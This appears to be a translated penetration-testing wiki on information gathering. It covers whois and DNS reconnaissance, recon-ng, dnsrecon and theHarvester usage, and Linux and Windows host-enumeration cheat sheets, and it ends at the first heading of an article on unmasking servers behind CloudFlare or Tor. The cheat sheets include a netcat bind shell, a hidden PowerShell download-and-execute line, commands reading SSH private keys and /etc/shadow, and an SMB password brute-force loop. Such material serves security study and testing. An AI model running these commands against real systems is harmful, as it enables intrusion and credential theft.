A whois query returns information about the target company. With this kind of query you can also search for other entities associated with the target company. To run a whois query against a remote host, the attacker issues the command whois baidu.com, which produces the following output:

root@wing:~# whois baidu.com
   Domain Name: BAIDU.COM
   Registry Domain ID: 11181110_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.markmonitor.com
   Registrar URL: http://www.markmonitor.com
   Updated Date: 2017-07-28T02:36:28Z
   Creation Date: 1999-10-11T11:05:17Z
   Registry Expiry Date: 2026-10-11T11:05:17Z
   Registrar: MarkMonitor Inc.
   Registrar IANA ID: 292
   Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
   Registrar Abuse Contact Phone: +1.2083895740
   Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
   Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
   Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
   Name Server: DNS.BAIDU.COM
   Name Server: NS2.BAIDU.COM
   Name Server: NS3.BAIDU.COM
   Name Server: NS4.BAIDU.COM
   Name Server: NS7.BAIDU.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2017-12-10T07:03:24Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

We will first name each part (A to D), then look at each in more detail, explaining how each affects security and how an attacker correlates this information into a detailed profile of the target, plus other details about the internal network and the organization's structure in preparation for penetration. Before digging into the information shown in the whois record, though, we describe which whois searches can be used to look up a domain's information. The table below shows where to query whois information for each region of the world.

Whois service    Region covered    Service address
ARIN    American Registry for Internet Numbers (continental US)    http://arin.net
APNIC    Asia Pacific Network Information Centre    http://apnic.net
LACNIC    Latin America and Caribbean address registry    http://lacnic.net
NIC.gov    Government lookups    http://nic.gov/whois.html
NetworkSolutions.com    Com, Net, Org, Edu name lookups    http://networksolutions.com
Whois.net    Whois lookup service    http://whois.net
Crsnic.net    Verisign Whois lookup    http://crsnic.net

http://registrar.verisign-grs.com/whois/
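As an added example (not from the original wiki), the following Python parses the registry record layout shown above into a dictionary and then reviews it the way the domain's owner would: registrar locks present, expiry not imminent, DNSSEC signing, and more than one delegated name server. The first sample is a constructed excerpt with the values of the baidu.com record above; the second is a constructed placeholder record with weaker settings.

```python
import re
from datetime import datetime, timedelta

# Constructed excerpt in the layout of the registry record shown above;
# the values are copied from that record, this is not a live lookup.
SAMPLE_WHOIS = """\
   Domain Name: BAIDU.COM
   Registrar WHOIS Server: whois.markmonitor.com
   Updated Date: 2017-07-28T02:36:28Z
   Creation Date: 1999-10-11T11:05:17Z
   Registry Expiry Date: 2026-10-11T11:05:17Z
   Registrar: MarkMonitor Inc.
   Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Name Server: DNS.BAIDU.COM
   Name Server: NS2.BAIDU.COM
   DNSSEC: unsigned
>>> Last update of whois database: 2017-12-10T07:03:24Z <<<
"""

# A second constructed record (placeholder domain) with weaker settings.
WEAK_WHOIS = """\
   Domain Name: EXAMPLE-PLACEHOLDER.COM
   Registry Expiry Date: 2018-01-15T00:00:00Z
   Domain Status: ok https://icann.org/epp#ok
   Name Server: NS1.EXAMPLE-PLACEHOLDER.COM
   DNSSEC: unsigned
"""

# 'Key: value'; the key is letters, spaces or '/' up to the first colon,
# so URLs inside values (which also contain ':') stay in the value.
FIELD_RE = re.compile(r"^\s*([A-Za-z][A-Za-z /]*?):\s*(.*?)\s*$")
MULTI_VALUED = {"Domain Status", "Name Server"}
DATE_FMT = "%Y-%m-%dT%H:%M:%SZ"
REQUIRED_LOCKS = {"clientDeleteProhibited", "clientTransferProhibited", "clientUpdateProhibited"}


def parse_whois(text):
    """Turn a registry record into a dict; repeatable keys become lists."""
    record = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue            # '>>> Last update ...' and blank lines
        key, value = m.group(1), m.group(2)
        if key in MULTI_VALUED:
            # status values carry a trailing EPP URL; keep only the code
            record.setdefault(key, []).append(value.split()[0])
        else:
            record[key] = value
    return record


def review(record, now_utc, expiry_warn_days=90):
    """Return the findings a domain owner would act on, as short strings."""
    findings = []
    missing = REQUIRED_LOCKS - set(record.get("Domain Status", []))
    if missing:
        findings.append("missing registrar locks: " + ", ".join(sorted(missing)))
    expiry = datetime.strptime(record["Registry Expiry Date"], DATE_FMT)
    now = datetime.strptime(now_utc, DATE_FMT)
    if expiry - now < timedelta(days=expiry_warn_days):
        findings.append(f"expires within {expiry_warn_days} days: {expiry.date()}")
    if record.get("DNSSEC", "").lower() == "unsigned":
        findings.append("zone is not DNSSEC-signed")
    if len(record.get("Name Server", [])) < 2:
        findings.append("fewer than two name servers delegated")
    return findings


if __name__ == "__main__":
    for text in (SAMPLE_WHOIS, WEAK_WHOIS):
        rec = parse_whois(text)
        print(rec["Domain Name"], review(rec, "2017-12-10T07:03:24Z"))
```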

Additional information returned by a whois query that can be abused:

Returned query    Returned data    Use
Address – Country    Location of target
  • physical security
  • dumpster diving
  • social engineering
Net Range – Name Servers    Internet addressing scheme
  • positioning for exploitation
  • zone transfers (ixfr and axfr)
Registration Update & Expiry Date    Formats and times
  • social engineering
  • DNS cache poisoning
RTech handle – RTech Email    Administrator contact – first / last name
  • social engineering
  • reverse engineering
  • e-mail contact
  • possible phone number
  • home address

Gathering and mining additional data with whois

Resource    Information obtained    Use of the information
myspace.com, meetspot.com, adultfriendfinder.com, friendfinder.com, facebook.com, classmates.com
  Information obtained:
  • a profile of the target under investigation
  • the people they associate with
  • a full picture of likes, dislikes and weaknesses
  • an inconspicuous vantage point into their lives
  Use:
  • social engineering / reverse engineering
  • using their machines to reach company machines
  • passive information gathering by sniffing
  • possibility of physical intrusion: a physical attack can use keyloggers and other hardware
Corporate BBS, Google searches for help, IT/IS vendor searches (IBM, Solaris, etc.)
  Information obtained:
  • specific problems and help files
  • technical or security staff involved in resolving tasks
  • long-term / short-term solutions that can be exploited
  • possibility of usernames, even passwords, being exposed
  Use:
  • social engineering / reverse engineering
  • username brute forcing
  • internet mapping
  • short-term solutions may contain vulnerabilities; long-term solutions may need further digging
  • exposes the target's testing capability, password availability, and usernames that can grant access
monster.com, bigapplehead.com, dice.com, other job searches
  Information obtained:
  • architecture to exploit
  • contact information
  • geographic location
  • possibility of additional links on the corporate website, which may return more hidden links
  Use:
  • social engineering / reverse engineering
  • ability to gain on-site access promptly, photograph the premises and social-engineer the employer
  • collecting which technologies can be used to launch a penetration test or attack on the target
  • learning more and applying security measures during interviews
  • interview visits bring us closer to the target and teach us about it

How to gather DNS information

  • Passive mode
    • DNS enumeration
    • OSINT (open-source intelligence)
  • Offensive mode
    • crawling websites
  • Tools
    • recon-ng
    • dnsrecon
    • theHarvester

Passive mode

DNS enumeration

DNS enumeration is the process of locating all of an organization's DNS servers and their corresponding records. A company may have both internal and external DNS servers, which can yield information such as usernames, computer names and the IP addresses of potential target systems. Many tools can be used to obtain the information needed for DNS enumeration; examples are NSlookup, DNSstuff, the American Registry for Internet Numbers (ARIN) and Whois. To enumerate DNS you must understand DNS and how it works.

You must know the DNS record types. The list of DNS records gives an overview of the resource record types (database records) stored in the zone files of the Domain Name System (DNS). DNS implements a distributed, hierarchical and redundant database for information related to Internet domain names and addresses. In these domain servers, different record types serve different purposes. The list below describes the common DNS record types and their use:

DNS record type    Method    Description
dns query    A    Address record: returns a 32-bit IPv4 address; most commonly used to map hostnames to IP addresses, but also used for DNSBLs, storing subnet masks per RFC 1101, and so on.
dns query    CNAME    Canonical name record: lets you map multiple names to the same machine.
dns query    AAAA    IPv6 address record: returns a 128-bit IPv6 address; most commonly used to map hostnames to IP addresses.
dns query    MX    Mail exchange record: maps a domain name to the list of mail transfer agents for that domain.
dns query    NS    Name server record: delegates a DNS zone to the given authoritative name servers.
dns query    SOA    Start of authority record: specifies authoritative information about a DNS zone, including the primary name server, the domain administrator's e-mail, the zone serial number and several timers related to refreshing the zone.
dns query    SPF    Sender Policy Framework: a simple e-mail validation system designed to detect e-mail spoofing by giving receiving mail exchangers a way to check that incoming mail from a domain comes from a host authorized by that domain's administrators.
dns query    TXT    Text record: originally for arbitrary human-readable text in a DNS record.
dns query    PTR    Pointer record: a pointer to a canonical name. Unlike CNAME, DNS processing stops and only the name is returned. The most common use is implementing reverse DNS lookups, but other uses include DNS-SD and so on.
dns query    SRV    Service locator: a generalized service location record, used for newer protocols instead of creating protocol-specific records such as MX.
dns query    NSEC    Next Secure record: part of DNSSEC, used to prove that a name does not exist. Uses the same format as the obsolete NXT record.
dns query    AXFR    Authoritative zone transfer: transfers the entire zone file from the primary zone name server to secondary name servers. DNS zone transfers are usually used to replicate DNS data across multiple DNS servers or to back up DNS files. A user or server performs a zone transfer request against a name server; if the name server allows the zone transfer, all DNS names and IP addresses it hosts are returned as human-readable ASCII text.
dns query    IXFR    Incremental zone transfer: transfers the entire zone file from the primary name server to secondary name servers.
dns query    DNS Wildcard    Checks whether the name servers have wildcard queries enabled, or DNS spoofing.
dns query    domain bruteforce    Brute-force subdomains with a dictionary
dns query    reverse bruteforce    Reverse-lookup domain names from IPs
dns query    srv bruteforce    Brute-force SRV records
dns query    gtld bruteforce    Brute-force gTLD records
dns query    tld bruteforce    Brute-force TLD records

OSINT

OSINT category    Description
OSInt Google    Spider domain names from Google: demo.com
OSInt Bing    Spider domain names from Bing: demo.com
OSInt Yahoo    Spider domain names from Yahoo: demo.com
OSInt Baidu    Spider domain names from Baidu: demo.com
OSInt Netcraft    Crawl domain names from the netcraft searchdns pages
OSInt Github    From Github
OSInt Shodan    Spider domain names from Shodan
OSInt Censys    Spider domain names from Censys
OSInt ZoomEye    Spider domain names from ZoomEye

Active (attack) mode: information gathering

Attack mode    Method    Description
Websites    Spider default page    Scan default pages and crawl the target site
Websites    Certificates    Scan domain certificates
Tools
recon-ng command    Description
use recon/domains-hosts/baidu_site    Search domain names via Baidu
use recon/domains-hosts/bing_domain_api    Search domain names via the Bing API
use recon/domains-hosts/bing_domain_web    Search domain names via Bing web pages
use recon/domains-hosts/brute_hosts    Brute-force subdomains
use recon/domains-hosts/google_site_api    Search domain names via the Google API
use recon/domains-hosts/google_site_web    Search domain names via Google web pages.
use recon/domains-hosts/netcraft    Search domains from netcraft pages.
dnsrecon command    Description
dnsrecon -n 8.8.8.8 -d demo.com    Use a valid DNS server to avoid DNS spoofing.
dnsrecon -d demo.com -t std    SOA, NS, A, AAAA, MX and SRV if AXFR on the NS servers fails.
dnsrecon -d demo.com -t rvl    Reverse lookup of the given CIDR or IP range.
dnsrecon -d demo.com -t brt -D /path/to/subdomains.wd    Brute-force domains and hosts with the given dictionary.
dnsrecon -d demo.com -t brt -D /path/to/subdomains.wd --iw    Brute-force domain names with the given dictionary, continuing even if a wildcard record is found
dnsrecon -d demo.com -t srv    SRV records
dnsrecon -d demo.com -t axfr    Test all NS servers for zone transfer.
dnsrecon -d demo.com -t goo    Search Google for live subdomains and hosts.
dnsrecon -d demo.com -t tld    Strip the TLD of the given domain and test against all TLDs registered with IANA
dnsrecon -d demo.com -t zonewalk    Perform a DNSSEC zone walk using NSEC records.
dnsrecon -d demo.com --db /path/to/results.sqlite    Save results to a sqlite file
dnsrecon -d demo.com --xml /path/to/results.xml    Save results to an xml file.
dnsrecon -d demo.com -c /path/to/results.csv    Save results to a csv file.
dnsrecon -d demo.com -j /path/to/results.json    Save results to a json file.
theHarvester command    Description
theharvester -d demo.com -b all    Query target information via google, googleCSE, bing, bingapi, pgp, linkedin, google-profiles, jigsaw, twitter, googleplus, etc.
theharvester -d demo.com -n    Run a DNS reverse query on all ranges discovered
theharvester -d demo.com -c    Run a DNS brute force on the domain
theharvester -d demo.com -t    Run DNS TLD expansion discovery
theharvester -d demo.com -e 8.8.8.8    Use the specified DNS server
theharvester -d demo.com -h    Query discovered hosts against the SHODAN database
Metasploit command    Description
msf > use auxiliary/gather/enum_dns    Gather DNS record information (A, AAAA, CNAME, ZoneTransfer, SRV, TLD, RVL, ...)

 


Related links

Information gathering on Linux

System architecture
Commands and descriptions
  • uname -a: The uname command reports basic information about the computer's software and hardware.

  • cat /etc/issue: /etc/issue is a text file containing a message or system identification printed before the login prompt.

  • cat /etc/*-release: /etc/lsb-release and /etc/redhat-release contain a description line that is parsed to obtain information, e.g. "Distributor release x.x (Codename)".

  • cat /proc/version: /proc/version gives the version of the Linux kernel, the version of gcc used to compile it, and when the kernel was compiled. It also contains the user name of whoever compiled the kernel.

  • cat /proc/sys/kernel/version: the files in /proc/sys/kernel/ can be used to tune and monitor various activities of the Linux kernel.

Processes
  • ps -ef / ps aux: list a snapshot of the current processes

  • top: top shows the processor activity of your Linux machine and the tasks it manages in real time. It shows processor and memory usage along with other information such as running processes.

  • ls -al /proc/: /proc is very special; it is also a virtual file system, sometimes called the process information pseudo-file system. It contains no "real" files but runtime system information, e.g. system memory, mounted devices, hardware configuration and so on.
  • ls -al /proc/99: view information about PID 99.
Users and groups
Command    Description
id    Show the user's UID, GID and related information.
w    Show who is logged on to the Linux server.
whoami    Show the current user name
lastlog    Format and print the contents of the last-login log, /var/log/lastlog.
cat /etc/passwd    A text database of the users who may log into the system, or of other operating-system identities that own running processes.
cat /etc/shadow    /etc/shadow raises the security level of passwords by restricting access to the hashed password data to highly privileged users. Normally that data is kept in a file owned by the superuser and readable only by the superuser.
cat /etc/master.passwd    /etc/master.passwd on BSD systems
cat /etc/sudoers    The /etc/sudoers file holds the rules that apply when using the sudo command
sudo -V    Print the sudo version string
cat ~/.ssh/authorized_keys    With public-key authentication the authenticating entity has a public key and a private key. Each key is a large number with special mathematical properties. The private key stays on the computer you log in from; the public key is stored in the .ssh/authorized_keys file on every computer you want to log in to.
cat ~/.ssh/identity.pub    identity.pub contains your public key, which can be added to the authorized_keys file on other systems.
cat ~/.ssh/identity    Lets the ssh client select the file from which the RSA or DSA authentication identity (private key) is read.
cat ~/.ssh/id_rsa.pub    RSA public key, saved as .ssh/id_rsa.pub.
cat ~/.ssh/id_rsa    RSA private key, saved in your home directory as .ssh/id_rsa.
cat ~/.ssh/id_dsa.pub    DSA public key, saved as .ssh/id_dsa.pub.
cat ~/.ssh/id_dsa    DSA private key, saved in your home directory as .ssh/id_dsa.
cat /etc/ssh/ssh_config    OpenSSH SSH client configuration file
cat /etc/ssh/sshd_config    OpenSSH SSH server configuration file
cat /etc/ssh/ssh_host_dsa_key.pub    DSA public key used by the sshd daemon.
cat /etc/ssh/ssh_host_dsa_key    DSA private key used by the sshd daemon.
cat /etc/ssh/ssh_host_rsa_key.pub    RSA public key used by the sshd daemon for SSH protocol version 2.
cat /etc/ssh/ssh_host_rsa_key    RSA private key used by the sshd daemon.
Services
Command    Description
service --status-all    Check the status of all services
systemctl -a    List all units installed on the file system.
service servicename start / systemctl start servicename    Start a service
service servicename stop / systemctl stop servicename    Stop a service
service servicename status / systemctl status servicename    Show the status of a service
cat /etc/services    /etc/services maps port numbers to named services.
Security

Command    Description
iptables -L    List all rules in the chains.
iptables -F    Flush all rules from the selected chain.
iptables -A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT    Run iptables -p icmp --help for more information.
iptables -A INPUT -p tcp -m tcp --sport 80 -m state --state RELATED,ESTABLISHED -j ACCEPT    Allow tcp connections from src port 80
iptables -A OUTPUT -p tcp -m tcp --dport 80 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT    Allow TCP connections from/to dst port 80.
iptables -A INPUT -p udp -m udp --sport 53 -m state --state RELATED,ESTABLISHED -j ACCEPT    Allow udp connections from src port 53
iptables -A OUTPUT -p udp -m udp --dport 53 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT    Allow udp connections from/to dst port 53.
iptables -A OUTPUT -p tcp -m tcp --sport 55552 -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --dport 55552 -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT    Allow localhost to connect to localhost:55552

 

Network
Command    Description
ifconfig -a    Show all interfaces currently available
hostname    Show or set the system's host name.
dnsdomainname    Show the system's DNS domain name.
netstat -antp    Show network status (TCP sockets, with the owning process)
netstat -anup    Show network status (UDP sockets, with the owning process)
chkconfig --list    Show the run status of all runlevel system services
lsof -nPi    List open network files
route -e    Show/manipulate the IP routing table
iwconfig    Configure a wireless network interface
cat /etc/resolv.conf    The DNS resolver configuration file. Its format is simple: each line starts with a keyword followed by its parameters. resolv.conf has four main keywords: nameserver (the IP address of a DNS server), domain (the local domain name), search (the domain search list) and sortlist (sort order for returned addresses)
cat /etc/hosts    /etc/hosts is a plain text file that maps IP addresses to host names, one IP address per line.
cat /etc/network/interfaces    /etc/network/interfaces contains the network interface configuration.
cat /etc/sysconfig/network    /etc/sysconfig/network specifies information about the network configuration wanted on the server.
cat /etc/networks    /etc/networks is a simple ASCII file describing the known DARPA networks and their symbolic names.
cat /proc/net/tcp    Print tcp socket information in hexadecimal
cat /proc/net/udp    Print udp socket information in hexadecimal
cat /proc/net/icmp    Print icmp socket information in hexadecimal
cat /proc/net/route    Print routing information in hexadecimal
cat /etc/inetd.conf    inetd, also called the super-server, loads network programs on request from the network. inetd.conf tells inetd which ports to listen on and which server to start for each port.
cat /etc/xinetd.conf    xinetd.conf is the configuration file that determines the services xinetd provides.
ls -R /etc/network/    Show the files related to network configuration
ls -al /etc/init.d    List all init scripts
iptables -L -t nat    Print the chains of the nat table
iptables -L -t mangle    Print the chains of the mangle table
tcpdump    tcpdump cheat sheet
nc -v host port    Open a tcp connection
nc -v -e /bin/sh -l -p port    Serve a shell on a local listening port
File system
Command    Description
cat /etc/profile    /etc/profile holds the system-wide environment and startup programs. It is used by all users of the bash, ksh and sh shells.
cat /etc/bashrc    /etc/bashrc or /etc/bash.bashrc is the system-wide per-interactive-shell startup file for bash, used for system-wide functions and aliases.
cat ~/.bash_profile    Like /etc/profile, but only for the current user
cat ~/.bash_history    Print the current user's bash command history
cat ~/.bashrc    ~/.bashrc is the per-interactive-shell startup file stored in your home directory ($HOME).
cat ~/.zshrc    ~/.zshrc is the interactive-shell startup file for zsh stored in your home directory ($HOME).
cat ~/.bash_logout    ~/.bash_logout is not used by invoked shells. It is read and executed when the user exits an interactive login shell.
ls -al /var/log/    List all log files
find / -perm -1000 -type d 2>/dev/null    Sticky bit – only the directory owner or the file owner can delete or rename here.
find / -perm -g=s -type f 2>/dev/null    SGID (chmod 2000) – runs as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    SUID (chmod 4000) – runs as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    SGID or SUID
for i in $(locate -r "bin$"); do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    Quick SGID or SUID search in the 'common' locations: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin.
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null    Starting from the root (/), find SGID or SUID files, not symbolic links, only 3 directories deep, listing full details and hiding any errors (e.g. permission denied)
find / -writable -type d 2>/dev/null    Find writable directories
find / -perm -222 -type d 2>/dev/null    Find writable directories
find / -perm -o=w -type d 2>/dev/null    Find world-writable directories
find / -perm -o=x -type d 2>/dev/null    Find world-executable directories
find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null    Find world-writable and executable directories
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print    Find world-writable directories without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print    Find files with no owner or no group
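The find commands above are what an intruder runs first after landing on a box; the same checks make a useful periodic audit for the administrator. As an added example (not part of the original wiki), this Python walks a directory tree and collects the same classes of hits (setuid and setgid regular files, world-writable directories, and world-writable directories lacking the sticky bit), skipping symbolic links like the "! -type l" variant above. It builds a constructed throwaway tree under a temporary directory so that it runs without touching the real file system; point audit_tree at "/" to audit a real host.

```python
import os
import stat
import tempfile


def audit_tree(root):
    """Walk root and collect the same classes of hits as the find commands above."""
    hits = {"suid": [], "sgid": [], "world_writ_dirs": [], "world_writ_no_sticky": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)                 # lstat: symlinked directories are skipped
            if stat.S_ISDIR(st.st_mode) and (st.st_mode & stat.S_IWOTH):
                hits["world_writ_dirs"].append(path)
                if not (st.st_mode & stat.S_ISVTX):
                    hits["world_writ_no_sticky"].append(path)
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)                 # do not follow symlinks ('! -type l')
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_ISUID:
                hits["suid"].append(path)
            if st.st_mode & stat.S_ISGID:
                hits["sgid"].append(path)
    return hits


def _mkdir(path, mode):
    os.mkdir(path)
    os.chmod(path, mode)          # explicit chmod so the umask does not decide the result


def _write_script(path, mode):
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(path, mode)


def build_sample_tree():
    """Create a constructed throwaway tree with one of each finding; returns its root."""
    root = tempfile.mkdtemp(prefix="audit-demo-")
    _mkdir(os.path.join(root, "usr"), 0o755)
    _mkdir(os.path.join(root, "usr", "bin"), 0o755)
    _mkdir(os.path.join(root, "var"), 0o755)
    _mkdir(os.path.join(root, "tmp"), 0o1777)         # world-writable + sticky: normal for /tmp
    _mkdir(os.path.join(root, "var", "drop"), 0o777)  # world-writable, no sticky bit: finding
    suid = os.path.join(root, "usr", "bin", "demo-suid")
    _write_script(suid, 0o4755)                       # setuid: finding
    _write_script(os.path.join(root, "usr", "bin", "demo-plain"), 0o755)  # no finding
    os.symlink(suid, os.path.join(root, "usr", "bin", "demo-link"))     # symlink: ignored
    return root


def run_demo():
    """Build the sample tree, audit it, and return root-relative hits."""
    root = build_sample_tree()
    hits = audit_tree(root)
    return {k: sorted(os.path.relpath(p, root) for p in v) for k, v in hits.items()}


if __name__ == "__main__":
    for kind, paths in run_demo().items():
        print(kind, paths)
```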
Programs
Command    Description
crontab -l    Display the current crontab on standard output
ls -alh /var/spool/cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow    /etc/at.allow and /etc/at.deny determine which users may submit commands for later execution via at or batch.
cat /etc/at.deny    /etc/at.allow and /etc/at.deny determine which users may submit commands for later execution via at or batch.
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
ls -la /var/spool/cron/crontabs    List all users' crontab files
cat /var/spool/cron/crontabs/root    Print the root user's crontab
Related links
  1. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
  2. https://github.com/CISOfy/lynis
  3. https://github.com/rebootuser/LinEnum
  4. https://github.com/nixawk/metasploit-modules/blob/master/.msf4/modules/post/linux/gather/enum_linux.rb
  5. http://www.iptables.org/documentation/
  6. http://packetlife.net/media/library/12/tcpdump.pdf
Information gathering on Windows
System architecture
Command    Description
ver    Show the Windows version.
systeminfo
systeminfo /S ComputerName /U username /P password    This tool shows the operating system configuration of a local or remote computer, including the service pack level.
wmic os list brief    Installed operating system management.
wmic computersystem list full    Computer system management.
Processes
Command    Description
tasklist
tasklist /M
tasklist /V    Show the list of processes currently running on the local machine.
tasklist /FI "IMAGENAME eq cmd.exe"
tasklist /FI "PID ne 0"    Show the processes matching the criteria given by a set of filters.
tasklist /S SERVER /U DOMAIN\username /P password    Show the list of processes currently running on a remote machine.
wmic process list brief    Process management.

Users and groups

Command    Description
whoami    List information about the user you are currently logged in as.
net user    Show user account information.
net user /domain    Perform the operation on the domain controller of the computer's primary domain.
net localgroup administrators    Show the local administrators group on the computer.
net localgroup administrators /domain    Show the local administrators group on the current domain controller.
net group /domain    Show groups, performing the operation on the domain controller of the current domain.
net group "Domain Admins" /domain    List the users of the Domain Admins group in the current domain.
net group "Domain Computers" /domain    List all domain computers in the current domain.
net group "Domain Controllers" /domain    List the domain controllers.
net group "Domain Policy Creator Owners" /domain    List the domain policy creator owners.
net accounts /domain    Update the user account database and change the password and logon requirements for all accounts. Performs the operation on the primary domain controller of the current domain.
wmic useraccount    User account management.
wmic useraccount LIST BRIEF    Print account information.
Services
Command    Description
sc qc servicename    Query the configuration of a service.
sc query servicename    Query the status of a service, or enumerate the status of service types.
sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys    Create a service entry in the registry and the service database.
System security
Command    Description
wmic qfe get hotfixid    Information about the hotfixes installed on Windows
NETSH FIREWALL show all    Show the allowed-program configuration for the domain/standard profile.
Network
Command    Description
ipconfig /all    Show the full TCP/IP configuration of all adapters.
ipconfig /displaydns    Show the contents of the DNS client resolver cache, which includes entries preloaded from the local hosts file and any recently obtained resource records for name queries resolved by the computer. The DNS Client service uses this information to answer frequently queried names quickly before querying its configured DNS servers.
netstat -ano    Show active TCP connections, including the process ID (PID) of each connection.
netstat -ano -p tcp    Show tcp connections.
netstat -ano -p udp    Show udp connections.
netstat -r    Show the system routing table.
route print    Show the system routing table.
net view    Show a list of domain computers, or of the resources shared by the specified computer.
net view /domain:DOMAINNAME    Specify the domain whose available computers to view. If DomainName is omitted, /domain shows all domains on the network.
net view \\ComputerName    Specify the computer whose shared resources to view.
wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"    Create a new process on a remote server.
powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))"    Execute code from a remote server.
powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')"    Download a file from a remote server.
File system
Command    Description
type C:\Windows\system32\demo.txt    Show the contents of a file.
dir /a    Show files with the specified attributes.
dir /s    Search subdirectories
dir /s "*wing*"    Search all subdirectories of the current directory for names containing 'wing'.
find /I wing C:\Windows\System32*.ini    Search one or more files for those containing the string 'wing'.
tree /F C:\Windows\system32    Show the folder structure of a drive or path as a tree.
fsutil fsinfo drives    List the current drives on the system.
wmic volume    Local storage volume management.
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber    Local storage device management.
net share    Show information about all resources shared on the local computer.
wmic share    Shared resource management.
net use \\ip\ipc$ password /user:username    Connect a computer to a shared resource, disconnect it, or show information about the computer's connections.
@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DomainController\IPC$ /user:<DomainName>\%n %p 1>NUL 2>&1 && @echo [*] %n:%p &&    Brute-force Windows accounts
FOR /F %f in ('dir /b /s C:\') do find /I "password" %f    Search the files on the C: drive for "password"
Startup and shutdown
Command    Description
wmic startup    Manage the commands that run automatically when a user logs on to the computer.

From the original (English)

The post Penetration Testing Wiki Part 1: Information Gathering (Pentest) appeared first on 🔰雚苁ℒ🔰.


Finding the real IP behind CloudFlare and the dark web (Tor)


This article is translated from:

https://www.secjuice.com/finding-real-ips-of-origin-servers-behind-cloudflare-or-tor/

Author: Paul Dannewitz

This article offers some approaches and methods for finding the real origin IP of servers that hide their IP; the main tool used is Censys.

Finding the real origin IP behind CloudFlare and TOR

The point of hidden services, of CloudFlare, or of any similar service is to hide the origin server's IP. But one small mistake can expose the IP. That lets an attacker attack a site using CloudFlare directly (bypassing the WAF, rate limiting, DDoS protection and so on), or even de-anonymize the operator of a TOR hidden service. Which mistakes apply depends on the service or technology you use; not every method works for every technology (for example, TOR hidden services have no MX record).

Note:

A word on TOR hidden services: besides anonymous access for clients, Tor can also provide anonymous service for servers. Through the Tor network, users can run servers whose location is unknown. The network formed by these servers is called "Tor Hidden Services", also known as the dark web. On the dark web neither side knows the other's IP address. Because a Tor hidden service needs no public IP address, the service can sit behind a firewall and NAT.

A DNS MX record is a mail exchanger record. It directs e-mail addressed to the domain to the mail server that handles it. For example, if a user's mail ends in the domain mydomain.com, an MX record for that domain must be added in the management interface to handle all mail ending in @mydomain.com.

1. SSL certificates

1.1 Using the given domain name

